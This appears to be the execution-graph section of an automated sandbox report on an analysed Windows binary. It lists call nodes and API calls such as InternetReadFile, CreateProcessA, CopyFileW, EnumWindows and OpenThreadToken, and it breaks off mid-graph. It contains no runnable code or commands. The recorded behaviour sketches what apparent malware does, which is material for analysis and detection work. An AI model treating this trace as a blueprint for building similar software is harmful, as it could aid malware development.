
                                      Execution Coverage:5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:14.2%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:41
                                      execution_graph 92698 91f010 92699 91f024 92698->92699 92700 91f083 92699->92700 92701 91f045 92699->92701 92706 8f72a0 92699->92706 92718 925570 41 API calls 2 library calls 92701->92718 92703 91f074 92719 96b9b0 27 API calls 92703->92719 92707 8f72e1 92706->92707 92708 8f730f 92707->92708 92709 8f72e9 92707->92709 92748 8f52d0 28 API calls 5 library calls 92708->92748 92720 916aeb 92709->92720 92710 8f72f1 92741 940dbb 92710->92741 92712 8f7309 92712->92701 92714 8f732e 92749 958621 RaiseException 92714->92749 92716 8f733c 92718->92703 92719->92700 92721 916b00 92720->92721 92750 8e0d80 92721->92750 92723 916b10 92755 906190 30 API calls 92723->92755 92725 916b3f 92756 915ab0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92725->92756 92727 916b4d 92728 916b59 92727->92728 92757 915af0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92727->92757 92739 916b60 92728->92739 92758 915346 28 API calls 92728->92758 92731 916f64 92731->92710 92732 916bbc 92734 916e8d 92732->92734 92740 916eec 92732->92740 92759 8f83c0 26 API calls 4 library calls 92732->92759 92734->92740 92760 8f83c0 26 API calls 4 library calls 92734->92760 92737 9177cb 92737->92739 92762 8f83c0 26 API calls 4 library calls 92737->92762 92739->92710 92740->92731 92761 915ab0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92740->92761 92742 940dc4 92741->92742 92743 940dc6 IsProcessorFeaturePresent 92741->92743 92742->92712 92745 941fab 92743->92745 92785 941f6d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92745->92785 92747 94208e 92747->92712 92748->92714 92749->92716 92751 8e0d95 92750->92751 92754 8e0dc4 92750->92754 92752 8e0da8 92751->92752 92763 918730 92751->92763 92752->92723 92754->92723 92755->92725 92756->92727 92757->92728 92758->92732 92759->92734 92760->92740 92761->92737 92762->92739 92772 96b48c 92763->92772 92765 91876b 92765->92754 92766 92a061 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection _MREFOpen@16 92767 91873f 92766->92767 92767->92765 92767->92766 92768 918771 Concurrency::details::_Condition_variable::wait_for 92767->92768 92771 96b48c ___std_exception_copy 21 API calls 92767->92771 92779 958621 RaiseException 92768->92779 92770 918789 92771->92767 92777 976393 std::_Locinfo::_W_Getmonths 92772->92777 92773 9763d1 92781 9661c3 92773->92781 92775 9763bc RtlAllocateHeap 92776 9763cf 92775->92776 92775->92777 92776->92767 92777->92773 92777->92775 92780 96d7eb 7 API calls 2 library calls 92777->92780 92779->92770 92780->92777 92784 974bfd 20 API calls 3 library calls 92781->92784 92783 9661c8 92783->92776 92784->92783 92785->92747 92786 977af5 92787 977b02 92786->92787 92790 977b1a 92786->92790 92788 9661c3 __Wcrtomb 20 API calls 92787->92788 92789 977b07 92788->92789 92843 965932 26 API calls messages 92789->92843 92792 977b75 92790->92792 92793 977b12 92790->92793 92844 976336 21 API calls 2 library calls 92790->92844 92806 973ea4 92792->92806 92796 977b8d 92813 97918f 92796->92813 92798 977b94 92798->92793 92799 973ea4 __fread_nolock 26 API calls 92798->92799 92800 977bc0 92799->92800 92800->92793 92801 973ea4 __fread_nolock 26 API calls 92800->92801 92802 977bce 92801->92802 92802->92793 92803 973ea4 __fread_nolock 26 API calls 92802->92803 92804 977bde 92803->92804 92805 973ea4 __fread_nolock 26 API calls 92804->92805 92805->92793 92807 973ec5 92806->92807 92808 973eb0 92806->92808 92807->92796 92809 9661c3 __Wcrtomb 20 API calls 92808->92809 92810 973eb5 92809->92810 92845 965932 26 API calls messages 92810->92845 92812 973ec0 92812->92796 92814 97919b ___scrt_is_nonwritable_in_current_image 92813->92814 92815 9791a3 92814->92815 92816 9791bb 92814->92816 92912 9661b0 92815->92912 92817 979281 92816->92817 92821 9791f4 92816->92821 92819 9661b0 __dosmaperr 20 API calls 92817->92819 92822 979286 92819->92822 92825 979203 92821->92825 92826 979218 92821->92826 92827 9661c3 __Wcrtomb 20 API calls 92822->92827 92823 9661c3 __Wcrtomb 20 API calls 92824 9791b0 std::_Xfsopen 92823->92824 92824->92798 92828 9661b0 __dosmaperr 20 API calls 92825->92828 92846 97d3a4 EnterCriticalSection 92826->92846 92837 979210 92827->92837 92830 979208 92828->92830 92832 9661c3 __Wcrtomb 20 API calls 92830->92832 92831 97921e 92833 97924f 92831->92833 92834 97923a 92831->92834 92832->92837 92847 9792a2 92833->92847 92838 9661c3 __Wcrtomb 20 API calls 92834->92838 92916 965932 26 API calls messages 92837->92916 92840 97923f 92838->92840 92839 97924a 92915 979279 LeaveCriticalSection __wsopen_s 92839->92915 92841 9661b0 __dosmaperr 20 API calls 92840->92841 92841->92839 92843->92793 92844->92792 92845->92812 92846->92831 92848 9792b4 92847->92848 92849 9792cc 92847->92849 92851 9661b0 __dosmaperr 20 API calls 92848->92851 92850 979636 92849->92850 92855 979311 92849->92855 92853 9661b0 __dosmaperr 20 API calls 92850->92853 92852 9792b9 92851->92852 92856 9661c3 __Wcrtomb 20 API calls 92852->92856 92854 97963b 92853->92854 92858 9661c3 __Wcrtomb 20 API calls 92854->92858 92857 9792c1 92855->92857 92859 97931c 92855->92859 92865 97934c 92855->92865 92856->92857 92857->92839 92860 979329 92858->92860 92861 9661b0 __dosmaperr 20 API calls 92859->92861 92940 965932 26 API calls messages 92860->92940 92862 979321 92861->92862 92864 9661c3 __Wcrtomb 20 API calls 92862->92864 92864->92860 92866 979365 92865->92866 92867 9793a7 92865->92867 92868 97938b 92865->92868 92866->92868 92901 979372 92866->92901 92927 976393 21 API calls 3 library calls 92867->92927 92869 9661b0 __dosmaperr 20 API calls 92868->92869 92870 979390 92869->92870 92872 9661c3 __Wcrtomb 20 API calls 92870->92872 92875 979397 92872->92875 92874 9793be 92928 975565 92874->92928 92926 965932 26 API calls messages 92875->92926 92876 979510 92879 979586 92876->92879 92883 979529 GetConsoleMode 92876->92883 92882 97958a ReadFile 92879->92882 92880 9793c7 92881 975565 _free 20 API calls 92880->92881 92884 9793ce 92881->92884 92885 9795a4 92882->92885 92886 9795fe GetLastError 92882->92886 92883->92879 92887 97953a 92883->92887 92888 9793f3 92884->92888 92889 9793d8 92884->92889 92885->92886 92892 97957b 92885->92892 92890 979562 92886->92890 92891 97960b 92886->92891 92887->92882 92893 979540 ReadConsoleW 92887->92893 92934 9797f5 92888->92934 92895 9661c3 __Wcrtomb 20 API calls 92889->92895 92910 9793a2 __fread_nolock 92890->92910 92937 96618d 20 API calls 3 library calls 92890->92937 92896 9661c3 __Wcrtomb 20 API calls 92891->92896 92905 9795e0 92892->92905 92906 9795c9 92892->92906 92892->92910 92893->92892 92898 97955c GetLastError 92893->92898 92894 975565 _free 20 API calls 92894->92857 92899 9793dd 92895->92899 92900 979610 92896->92900 92898->92890 92903 9661b0 __dosmaperr 20 API calls 92899->92903 92904 9661b0 __dosmaperr 20 API calls 92900->92904 92917 980447 92901->92917 92903->92910 92904->92910 92908 9795f7 92905->92908 92905->92910 92938 978fbe 31 API calls 4 library calls 92906->92938 92939 978dfe 29 API calls __wsopen_s 92908->92939 92910->92894 92911 9795fc 92911->92910 92966 974bfd 20 API calls 3 library calls 92912->92966 92914 9661b5 92914->92823 92915->92824 92916->92824 92918 980461 92917->92918 92919 980454 92917->92919 92922 98046d 92918->92922 92923 9661c3 __Wcrtomb 20 API calls 92918->92923 92920 9661c3 __Wcrtomb 20 API calls 92919->92920 92921 980459 92920->92921 92921->92876 92922->92876 92924 98048e 92923->92924 92941 965932 26 API calls messages 92924->92941 92926->92910 92927->92874 92929 975570 HeapFree 92928->92929 92930 975599 _free 92928->92930 92929->92930 92931 975585 92929->92931 92930->92880 92932 9661c3 __Wcrtomb 18 API calls 92931->92932 92933 97558b GetLastError 92932->92933 92933->92930 92942 97975c 92934->92942 92937->92910 92938->92910 92939->92911 92940->92857 92941->92921 92951 97d621 92942->92951 92944 97976e 92945 979787 SetFilePointerEx 92944->92945 92946 979776 92944->92946 92948 97979f GetLastError 92945->92948 92949 97977b 92945->92949 92947 9661c3 __Wcrtomb 20 API calls 92946->92947 92947->92949 92964 96618d 20 API calls 3 library calls 92948->92964 92949->92901 92952 97d643 92951->92952 92953 97d62e 92951->92953 92955 9661b0 __dosmaperr 20 API calls 92952->92955 92959 97d668 92952->92959 92954 9661b0 __dosmaperr 20 API calls 92953->92954 92956 97d633 92954->92956 92957 97d673 92955->92957 92958 9661c3 __Wcrtomb 20 API calls 92956->92958 92960 9661c3 __Wcrtomb 20 API calls 92957->92960 92961 97d63b 92958->92961 92959->92944 92962 97d67b 92960->92962 92961->92944 92965 965932 26 API calls messages 92962->92965 92964->92949 92965->92961 92966->92914 92967 965992 92991 97734a 92967->92991 92970 9659ce 92972 9659d2 92970->92972 92973 9659ef 92970->92973 92971 965a87 93004 96595f 11 API calls _abort 92971->93004 92974 9659e4 92972->92974 92994 977661 92972->92994 92973->92974 92976 9661c3 __Wcrtomb 20 API calls 92973->92976 92977 975565 _free 20 API calls 92974->92977 92980 965a0b 92976->92980 92981 965a73 92977->92981 92978 965a91 92982 9661c3 __Wcrtomb 20 API calls 92980->92982 92983 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 92981->92983 92984 965a12 92982->92984 92985 965a83 92983->92985 92986 9661c3 __Wcrtomb 20 API calls 92984->92986 92987 965a2c 92986->92987 92987->92974 92988 965a41 92987->92988 92990 9661c3 __Wcrtomb 20 API calls 92987->92990 92988->92974 92989 9661c3 __Wcrtomb 20 API calls 92988->92989 92989->92974 92990->92988 93005 9770dd 92991->93005 92993 9659be 92993->92970 92993->92971 92995 97766d 92994->92995 92996 97767b 92994->92996 93049 9775a1 28 API calls 4 library calls 92995->93049 93050 982793 31 API calls 6 library calls 92996->93050 92999 977677 92999->92974 93000 97768c 93001 977692 93000->93001 93051 9775a1 28 API calls 4 library calls 93000->93051 93003 975565 _free 20 API calls 93001->93003 93003->92999 93004->92978 93006 9770e9 ___scrt_is_nonwritable_in_current_image 93005->93006 93013 96ca1b EnterCriticalSection 93006->93013 93008 9770f4 93014 977138 93008->93014 93012 977124 std::_Xfsopen 93012->92993 93013->93008 93015 977147 93014->93015 93016 97715a 93014->93016 93017 9661c3 __Wcrtomb 20 API calls 93015->93017 93016->93015 93018 97716d 93016->93018 93019 97714c 93017->93019 93036 9771dd 77 API calls 93018->93036 93035 965932 26 API calls messages 93019->93035 93022 977176 _Maklocstr 93023 9771b4 93022->93023 93024 9771a1 93022->93024 93028 977110 93022->93028 93037 9729c2 93023->93037 93025 9661c3 __Wcrtomb 20 API calls 93024->93025 93025->93028 93032 97712f 93028->93032 93029 9771d0 93046 96595f 11 API calls _abort 93029->93046 93031 9771dc 93048 96ca63 LeaveCriticalSection 93032->93048 93034 977136 93034->93012 93035->93028 93036->93022 93038 9729dd 93037->93038 93039 9729cf 93037->93039 93040 9661c3 __Wcrtomb 20 API calls 93038->93040 93039->93038 93043 9729f4 93039->93043 93041 9729e5 93040->93041 93047 965932 26 API calls messages 93041->93047 93044 9729ef 93043->93044 93045 9661c3 __Wcrtomb 20 API calls 93043->93045 93044->93028 93044->93029 93045->93041 93046->93031 93047->93044 93048->93034 93049->92999 93050->93000 93051->93001 93052 8c6ff8 InternetReadFile 93053 8c6ff0 SimpleUString::operator= 93052->93053 93053->93052 93057 8c6a9d Concurrency::details::SchedulerBase::Statistics 93053->93057 93062 8ec3b0 28 API calls 5 library calls 93053->93062 93055 8c71bd 93063 965942 93055->93063 93057->93055 93059 8c6aeb Concurrency::details::SchedulerBase::Statistics 93057->93059 93060 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93059->93060 93061 8c6ea2 93060->93061 93062->93053 93068 9658b7 26 API calls 4 library calls 93063->93068 93065 965951 93069 96595f 11 API calls _abort 93065->93069 93067 96595e 93068->93065 93069->93067 93070 977ec1 93071 977ed1 93070->93071 93072 977ee9 93070->93072 93073 9661c3 __Wcrtomb 20 API calls 93071->93073 93072->93071 93080 977f00 _strrchr 93072->93080 93074 977ed6 93073->93074 93179 965932 26 API calls messages 93074->93179 93076 977ee1 93077 977fb1 _strrchr 93078 977fd7 93077->93078 93079 978001 93077->93079 93081 977661 33 API calls 93078->93081 93083 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 93079->93083 93080->93077 93080->93080 93180 975508 93080->93180 93082 977fde 93081->93082 93114 977ff7 93082->93114 93116 9780dc 93082->93116 93087 97801b 93083->93087 93091 978023 93087->93091 93092 9729c2 ___std_exception_copy 26 API calls 93087->93092 93088 977f77 93094 9729c2 ___std_exception_copy 26 API calls 93088->93094 93089 977f69 93093 975565 _free 20 API calls 93089->93093 93090 975565 _free 20 API calls 93090->93076 93096 975565 _free 20 API calls 93091->93096 93095 978037 93092->93095 93093->93076 93097 977f85 93094->93097 93098 978042 93095->93098 93099 9780cf 93095->93099 93096->93114 93097->93099 93189 9773e8 93097->93189 93101 9661c3 __Wcrtomb 20 API calls 93098->93101 93198 96595f 11 API calls _abort 93099->93198 93108 978052 93101->93108 93103 9780db 93105 9729c2 ___std_exception_copy 26 API calls 93105->93108 93106 975565 _free 20 API calls 93106->93077 93107 977661 33 API calls 93107->93108 93108->93105 93108->93107 93109 97809a 93108->93109 93110 97808e 93108->93110 93111 9661c3 __Wcrtomb 20 API calls 93109->93111 93112 975565 _free 20 API calls 93110->93112 93113 97809f 93111->93113 93112->93114 93115 9780dc 71 API calls 93113->93115 93114->93090 93115->93091 93117 978102 93116->93117 93118 9780ea 93116->93118 93117->93118 93121 97810e 93117->93121 93122 978118 93117->93122 93119 9661c3 __Wcrtomb 20 API calls 93118->93119 93120 9780ef 93119->93120 93207 965932 26 API calls messages 93120->93207 93124 9661b0 __dosmaperr 20 API calls 93121->93124 93199 982bd3 93122->93199 93124->93118 93126 9780fa 93126->93114 93128 978156 93204 977e99 93128->93204 93129 97813f 93131 975565 _free 20 API calls 93129->93131 93133 978147 93131->93133 93136 975565 _free 20 API calls 93133->93136 93134 978190 93137 975565 _free 20 API calls 93134->93137 93135 9781b8 93139 9661b0 __dosmaperr 20 API calls 93135->93139 93136->93126 93138 978198 93137->93138 93141 975565 _free 20 API calls 93138->93141 93140 9781c9 Concurrency::details::QuickBitSet::QuickBitSet 93139->93140 93143 9781da CreateProcessA 93140->93143 93142 9781a3 93141->93142 93144 975565 _free 20 API calls 93142->93144 93145 978217 GetLastError 93143->93145 93146 97823c 93143->93146 93144->93126 93208 96618d 20 API calls 3 library calls 93145->93208 93148 9782fa 93146->93148 93149 978248 93146->93149 93209 9617a5 60 API calls _abort 93148->93209 93152 978282 93149->93152 93153 97824c WaitForSingleObject GetExitCodeProcess 93149->93153 93150 978223 93156 97822f 93150->93156 93157 978228 CloseHandle 93150->93157 93154 978287 93152->93154 93155 9782c3 93152->93155 93159 978272 93153->93159 93160 97826b CloseHandle 93153->93160 93161 978292 93154->93161 93162 97828b CloseHandle 93154->93162 93165 9782c7 CloseHandle 93155->93165 93166 9782ce 93155->93166 93163 978233 CloseHandle 93156->93163 93164 97827d 93156->93164 93157->93156 93158 978301 93159->93164 93167 978276 CloseHandle 93159->93167 93160->93159 93161->93164 93169 978296 CloseHandle 93161->93169 93162->93161 93163->93164 93170 975565 _free 20 API calls 93164->93170 93165->93166 93168 975565 _free 20 API calls 93166->93168 93167->93164 93171 9782d6 93168->93171 93169->93164 93172 9782a7 93170->93172 93173 975565 _free 20 API calls 93171->93173 93174 975565 _free 20 API calls 93172->93174 93175 9782e2 93173->93175 93176 9782b3 93174->93176 93177 975565 _free 20 API calls 93175->93177 93178 975565 _free 20 API calls 93176->93178 93177->93126 93178->93126 93179->93076 93181 975515 93180->93181 93182 975555 93181->93182 93183 975540 HeapAlloc 93181->93183 93186 975529 std::_Locinfo::_W_Getmonths 93181->93186 93185 9661c3 __Wcrtomb 19 API calls 93182->93185 93184 975553 93183->93184 93183->93186 93187 97555a 93184->93187 93185->93187 93186->93182 93186->93183 93252 96d7eb 7 API calls 2 library calls 93186->93252 93187->93088 93187->93089 93190 977404 93189->93190 93193 9773f6 93189->93193 93191 9661c3 __Wcrtomb 20 API calls 93190->93191 93192 97740c 93191->93192 93253 965932 26 API calls messages 93192->93253 93193->93190 93196 97742d 93193->93196 93195 977416 93195->93099 93195->93106 93196->93195 93197 9661c3 __Wcrtomb 20 API calls 93196->93197 93197->93192 93198->93103 93210 98285a 93199->93210 93202 975565 _free 20 API calls 93203 978135 93202->93203 93203->93128 93203->93129 93228 977e48 93204->93228 93206 977ebd 93206->93134 93206->93135 93207->93126 93208->93150 93209->93158 93211 982876 93210->93211 93211->93211 93212 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 93211->93212 93213 9828a4 93212->93213 93214 9828ac 93213->93214 93219 9828c0 93213->93219 93226 96618d 20 API calls 3 library calls 93214->93226 93215 9828b9 93220 975565 _free 20 API calls 93215->93220 93217 9729c2 ___std_exception_copy 26 API calls 93217->93219 93218 9828b3 93221 9661c3 __Wcrtomb 20 API calls 93218->93221 93219->93215 93219->93217 93222 982915 93219->93222 93223 98290b 93220->93223 93221->93215 93227 96595f 11 API calls _abort 93222->93227 93223->93202 93225 982921 93226->93218 93227->93225 93229 977e54 ___scrt_is_nonwritable_in_current_image 93228->93229 93236 96ca1b EnterCriticalSection 93229->93236 93231 977e62 93237 978302 93231->93237 93235 977e80 std::_Xfsopen 93235->93206 93236->93231 93238 97832b 93237->93238 93239 978357 93238->93239 93240 978369 93238->93240 93241 9661c3 __Wcrtomb 20 API calls 93239->93241 93242 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 93240->93242 93243 977e6f 93241->93243 93244 97837d 93242->93244 93248 977e8d 93243->93248 93245 9661c3 __Wcrtomb 20 API calls 93244->93245 93246 97838b 93244->93246 93245->93246 93247 975565 _free 20 API calls 93246->93247 93247->93243 93251 96ca63 LeaveCriticalSection 93248->93251 93250 977e97 93250->93235 93251->93250 93252->93186 93253->93195 93254 9415af 93255 9415bb ___scrt_is_nonwritable_in_current_image 93254->93255 93284 94123e 93255->93284 93257 9415c2 93258 94171b 93257->93258 93261 9415ec 93257->93261 94077 94216a 4 API calls 2 library calls 93258->94077 93260 941722 94078 9617f3 60 API calls _abort 93260->94078 93271 94162b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93261->93271 93295 970c35 93261->93295 93263 941728 94079 9617a5 60 API calls _abort 93263->94079 93267 941730 93268 94160b 93270 94168c 93305 970624 93270->93305 93271->93270 94073 9617bb 64 API calls 4 library calls 93271->94073 93274 941692 93309 8dc940 93274->93309 93278 9416b3 93278->93260 93279 9416b7 93278->93279 93280 9416c0 93279->93280 94075 961796 60 API calls _abort 93279->94075 94076 9413c4 13 API calls 2 library calls 93280->94076 93283 9416c9 93283->93268 93285 941247 93284->93285 94080 941905 IsProcessorFeaturePresent 93285->94080 93287 941253 94081 95aa06 10 API calls 3 library calls 93287->94081 93289 941258 93294 94125c 93289->93294 94082 970b15 93289->94082 93292 941273 93292->93257 93294->93257 93297 970c4c 93295->93297 93296 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93298 941605 93296->93298 93297->93296 93298->93268 93299 970bd9 93298->93299 93300 970c24 93299->93300 93301 970c08 93299->93301 93302 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93300->93302 93301->93300 94097 8b1960 93301->94097 93303 970c31 93302->93303 93303->93271 93306 970632 93305->93306 93307 97062d 93305->93307 93306->93274 94257 97036b 82 API calls 93307->94257 94258 941f40 93309->94258 93312 8dc9a4 93313 8e1fd0 collate 28 API calls 93312->93313 93315 8dc9d1 93313->93315 93314 8e2110 28 API calls 93314->93315 93315->93314 93316 8dca09 93315->93316 93317 8e2410 _MREFOpen@16 28 API calls 93316->93317 93318 8dca1a 93317->93318 95506 8d7070 148 API calls 7 library calls 93318->95506 93320 8dca1f 93321 8e2290 collate 26 API calls 93320->93321 93325 8dca34 93321->93325 93322 8dcbe5 93329 8ded55 93322->93329 94263 8b87e0 93322->94263 93324 8dcbcd SetErrorMode SetConsoleTitleW 94260 8c60a0 EnumWindows 93324->94260 93325->93322 93325->93324 93325->93325 93327 8dcce0 94300 8c3030 93327->94300 93330 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93329->93330 93332 8ded6f 93330->93332 94074 942289 GetModuleHandleW 93332->94074 93333 8dcc02 93333->93327 94281 8e1b30 93333->94281 93346 8dcd2a 94394 8b49c0 93346->94394 93350 8dcd35 94401 8ea350 93350->94401 93351 8dcc9f 93353 8e2290 collate 26 API calls 93351->93353 93354 8dccae 93353->93354 93358 8b87e0 97 API calls 93354->93358 93360 8dccc6 93358->93360 93362 8e2290 collate 26 API calls 93360->93362 93364 8dccd1 93362->93364 93363 8b49c0 52 API calls 93365 8dcd84 93363->93365 93366 8e2290 collate 26 API calls 93364->93366 93367 8b49c0 52 API calls 93365->93367 93366->93327 93368 8dcd93 93367->93368 93369 8dcdac CopyFileW 93368->93369 93370 8ea350 28 API calls 93369->93370 93371 8dcdca 93370->93371 93372 8ea420 28 API calls 93371->93372 93373 8dcde0 93372->93373 93374 8ea2e0 28 API calls 93373->93374 93375 8dcdf6 93374->93375 93376 8b49c0 52 API calls 93375->93376 93377 8dce04 93376->93377 93378 8b49c0 52 API calls 93377->93378 93379 8dce13 93378->93379 93380 8dce2c CopyFileW 93379->93380 93381 8dce41 93380->93381 94417 8eace0 93381->94417 93385 8dce80 93386 8e9d90 28 API calls 93385->93386 93387 8dce96 93386->93387 93388 8e2290 collate 26 API calls 93387->93388 93389 8dcea8 93388->93389 93390 8e9750 28 API calls 93389->93390 93391 8dcebf 93390->93391 93392 8e9d90 28 API calls 93391->93392 93393 8dced5 93392->93393 93394 8e2290 collate 26 API calls 93393->93394 93395 8dcee7 93394->93395 93396 8b87e0 97 API calls 93395->93396 93397 8dceff 93396->93397 93398 8e2290 collate 26 API calls 93397->93398 93399 8dcf0a 93398->93399 93400 8b87e0 97 API calls 93399->93400 93401 8dcf22 93400->93401 93402 8e2290 collate 26 API calls 93401->93402 93403 8dcf2d 93402->93403 93404 8eace0 28 API calls 93403->93404 93405 8dcf63 93404->93405 93406 8e9750 28 API calls 93405->93406 93407 8dcf7e 93406->93407 93408 8e9d90 28 API calls 93407->93408 93409 8dcf94 93408->93409 93410 8e2290 collate 26 API calls 93409->93410 93411 8dcfa6 93410->93411 93412 8b87e0 97 API calls 93411->93412 93413 8dcfbe 93412->93413 93414 8e2290 collate 26 API calls 93413->93414 93415 8dcfc9 93414->93415 94431 8d45a0 GetCurrentThread OpenThreadToken 93415->94431 93418 8b87e0 97 API calls 93419 8dcfe4 93418->93419 94458 8e1aa0 93419->94458 93421 8dd013 94463 8c38c0 93421->94463 93423 8dd083 94812 8c6550 GlobalMemoryStatusEx 93423->94812 93425 8dd08b 93427 8c6550 6 API calls 93425->93427 93426 8dd018 93426->93423 93429 8e1aa0 28 API calls 93426->93429 93428 8dd095 93427->93428 93430 8c6550 6 API calls 93428->93430 93434 8dd0ac 93428->93434 93431 8dd05b 93429->93431 93432 8dd0a2 93430->93432 93433 8e1aa0 28 API calls 93431->93433 93435 8c6550 6 API calls 93432->93435 93436 8dd06e 93433->93436 93438 8eace0 28 API calls 93434->93438 93435->93434 94501 8b9300 93436->94501 93439 8dd0f6 93438->93439 94832 8e2260 93439->94832 93444 8e19a0 26 API calls 93445 8dd12a 93444->93445 93446 8b49c0 52 API calls 93445->93446 93447 8dd135 93446->93447 93448 8eace0 28 API calls 93447->93448 93449 8dd169 93448->93449 93450 8b8ae0 71 API calls 93449->93450 93451 8dd17e 93450->93451 94848 8ea5a0 93451->94848 93454 8e19a0 26 API calls 94073->93270 94074->93278 94075->93280 94076->93283 94077->93260 94078->93263 94079->93267 94080->93287 94081->93289 94086 97d18d 94082->94086 94085 95aa2f 8 API calls 3 library calls 94085->93294 94089 97d1a6 94086->94089 94090 97d1aa 94086->94090 94087 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94088 941265 94087->94088 94088->93292 94088->94085 94089->94087 94090->94089 94092 97435c 94090->94092 94093 974363 94092->94093 94094 9743a6 GetStdHandle 94093->94094 94095 97440e 94093->94095 94096 9743b9 GetFileType 94093->94096 94094->94093 94095->94090 94096->94093 94104 91ee60 94097->94104 94099 8b198c 94113 915100 94099->94113 94103 8b19b5 94103->93301 94136 8f4f60 94104->94136 94106 91ee97 94159 94109a 94106->94159 94109 8f4f60 28 API calls 94110 91ef0b 94109->94110 94167 8e6e80 94110->94167 94112 91ef25 Concurrency::details::QuickBitSet::QuickBitSet 94112->94099 94114 915142 94113->94114 94115 91513e 94113->94115 94116 918730 _MREFOpen@16 24 API calls 94114->94116 94117 8f4f60 28 API calls 94115->94117 94116->94115 94118 915161 94117->94118 94218 914a30 CryptAcquireContextA 94118->94218 94120 915170 94235 914ff0 94120->94235 94122 91517c CryptGenRandom 94123 9151e4 94122->94123 94124 91518a 94122->94124 94126 8e23a0 _MREFOpen@16 28 API calls 94123->94126 94125 91519c CryptReleaseContext 94124->94125 94129 9151a5 94124->94129 94125->94129 94127 9151f1 94126->94127 94249 914b90 30 API calls 4 library calls 94127->94249 94133 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94129->94133 94130 915201 94250 958621 RaiseException 94130->94250 94132 91520f 94134 8b19ab 94133->94134 94135 941427 29 API calls __onexit 94134->94135 94135->94103 94137 8f4fb6 94136->94137 94141 8f4f91 94136->94141 94138 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94137->94138 94139 8f4fce 94138->94139 94139->94106 94140 8f4fac 94140->94137 94143 8f5002 94140->94143 94141->94137 94141->94140 94142 8f4fd4 94141->94142 94179 8e23a0 94142->94179 94144 8e23a0 _MREFOpen@16 28 API calls 94143->94144 94146 8f500f 94144->94146 94185 8f5750 28 API calls _MREFOpen@16 94146->94185 94150 8f5022 94186 958621 RaiseException 94150->94186 94151 8f4ff4 94184 958621 RaiseException 94151->94184 94154 8f5030 94187 958312 27 API calls ___std_exception_copy 94154->94187 94156 8f5087 94188 8e2410 94156->94188 94158 8f50a9 94158->94106 94160 94109f 94159->94160 94161 96b48c ___std_exception_copy 21 API calls 94160->94161 94162 91eef1 94160->94162 94164 9410bb Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 94160->94164 94213 96d7eb 7 API calls 2 library calls 94160->94213 94161->94160 94162->94109 94162->94112 94214 958621 RaiseException 94164->94214 94166 942370 94168 8e6eaf 94167->94168 94169 8e6ee1 94167->94169 94171 8e6eb3 94168->94171 94215 9186c0 30 API calls 3 library calls 94168->94215 94170 8e23a0 _MREFOpen@16 28 API calls 94169->94170 94173 8e6eee 94170->94173 94171->94112 94216 8b5930 28 API calls _MREFOpen@16 94173->94216 94174 8e6ecd 94174->94112 94176 8e6f01 94217 958621 RaiseException 94176->94217 94178 8e6f0f 94180 8e23c0 94179->94180 94180->94180 94199 8e1fd0 94180->94199 94182 8e23d2 94183 8f5750 28 API calls _MREFOpen@16 94182->94183 94183->94151 94184->94143 94185->94150 94186->94154 94187->94156 94189 8e2436 94188->94189 94190 8e243d 94189->94190 94191 8e2496 94189->94191 94192 8e2473 94189->94192 94190->94158 94195 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94191->94195 94196 8e248b _LStrxfrm 94191->94196 94193 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94192->94193 94194 8e2484 94193->94194 94194->94196 94197 965942 messages 26 API calls 94194->94197 94195->94196 94196->94158 94198 8e24d3 94197->94198 94203 8e1fee SimpleUString::operator= 94199->94203 94204 8e2014 94199->94204 94200 8e20fe 94212 8ee3b0 28 API calls SimpleUString::operator= 94200->94212 94203->94182 94204->94200 94205 8e208d 94204->94205 94206 8e2068 94204->94206 94208 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94205->94208 94211 8e2079 _LStrxfrm 94205->94211 94207 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94206->94207 94207->94211 94208->94211 94209 965942 messages 26 API calls 94209->94200 94210 8e20e0 Concurrency::details::SchedulerBase::Statistics 94210->94182 94211->94209 94211->94210 94213->94160 94214->94166 94215->94174 94216->94176 94217->94178 94219 914aa6 94218->94219 94220 914a7b GetLastError CryptAcquireContextA 94218->94220 94222 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94219->94222 94220->94219 94221 914a95 CryptAcquireContextA 94220->94221 94221->94219 94223 914ac4 SetLastError 94221->94223 94224 914ac0 94222->94224 94225 8e23a0 _MREFOpen@16 28 API calls 94223->94225 94224->94120 94226 914ad8 94225->94226 94251 914b90 30 API calls 4 library calls 94226->94251 94228 914aeb 94252 958621 RaiseException 94228->94252 94230 914af9 94253 958312 27 API calls ___std_exception_copy 94230->94253 94232 914b47 94233 8e2410 _MREFOpen@16 28 API calls 94232->94233 94234 914b69 94233->94234 94234->94120 94236 9150b7 94235->94236 94238 915035 94235->94238 94254 940f9a 5 API calls __Init_thread_wait 94236->94254 94239 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 94238->94239 94247 915080 